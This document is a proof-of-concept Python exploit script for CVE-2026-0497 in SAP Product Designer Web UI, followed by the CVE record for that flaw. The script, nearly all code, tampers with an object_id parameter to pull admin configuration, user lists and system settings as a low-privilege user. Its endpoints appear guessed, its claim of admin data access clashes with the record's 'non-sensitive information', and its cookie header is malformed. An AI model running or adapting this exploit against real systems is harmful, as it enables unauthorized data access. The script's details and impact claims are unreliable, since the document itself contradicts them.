CVE-2026-0497

# CVE-2026-0497 PoC - SAP Product Designer Information Disclosure # Target: SAP Product Designer Web UI # Authentication required: Low privilege user account import requests import re TARGET_URL = "https://sap-server:443/sap(bD1lbiZjPTAwMQ==)/bc/bsp/sap/" SESSION_COOKIE = "MYSAPSSO2=your_session_cookie_here" CSRF_TOKEN = "your_csrf_token_here" def exploit_information_disclosure(): """ This PoC demonstrates how a low-privilege user can access administrative information through the Product Designer Web UI. """ headers = { 'Cookie': f'MYSAPSSO2={SESSION_COOKIE}', 'CSRFToken': CSRF_TOKEN, 'Content-Type': 'application/x-www-form-urlencoded' } # Step 1: Access Product Designer with low privilege initial_page = requests.get( f"{TARGET_URL}product_designer/main.htm", headers=headers, verify=False ) # Step 2: Enumerate accessible objects # Modify object_id parameter to access unauthorized data exploit_urls = [ f"{TARGET_URL}product_designer/get_data.htm?object_id=ADMIN_CONFIG", f"{TARGET_URL}product_designer/get_data.htm?object_id=USER_LIST", f"{TARGET_URL}product_designer/get_data.htm?object_id=SYSTEM_SETTINGS" ] leaked_data = [] for url in exploit_urls: response = requests.get(url, headers=headers, verify=False) if response.status_code == 200 and len(response.text) > 0: leaked_data.append({ 'url': url, 'data': response.text, 'length': len(response.text) }) return leaked_data if __name__ == "__main__": print("[*] CVE-2026-0497 PoC - SAP Product Designer Information Disclosure") print("[*] Testing for unauthorized data access...") results = exploit_information_disclosure() for result in results: print(f"[!] Leaked data from: {result['url']}") print(f" Data length: {result['length']} bytes")

{"cve": {"id": "CVE-2026-0497", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:52.150", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Product Designer Web UI of Business Server Pages allows authenticated non-administrative users to access non-sensitive information. This results in a low impact on confidentiality, with no impact on integrity or availability of the application."}, {"lang": "es", "value": "La Interfaz de usuario web de SAP Product Designer de Páginas de Servidor de Negocio permite a usuarios autenticados no administrativos acceder a información no sensible. Esto resulta en un impacto bajo en la confidencialidad, sin impacto en la integridad o disponibilidad de la aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://me.sap.com/notes/3677111", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}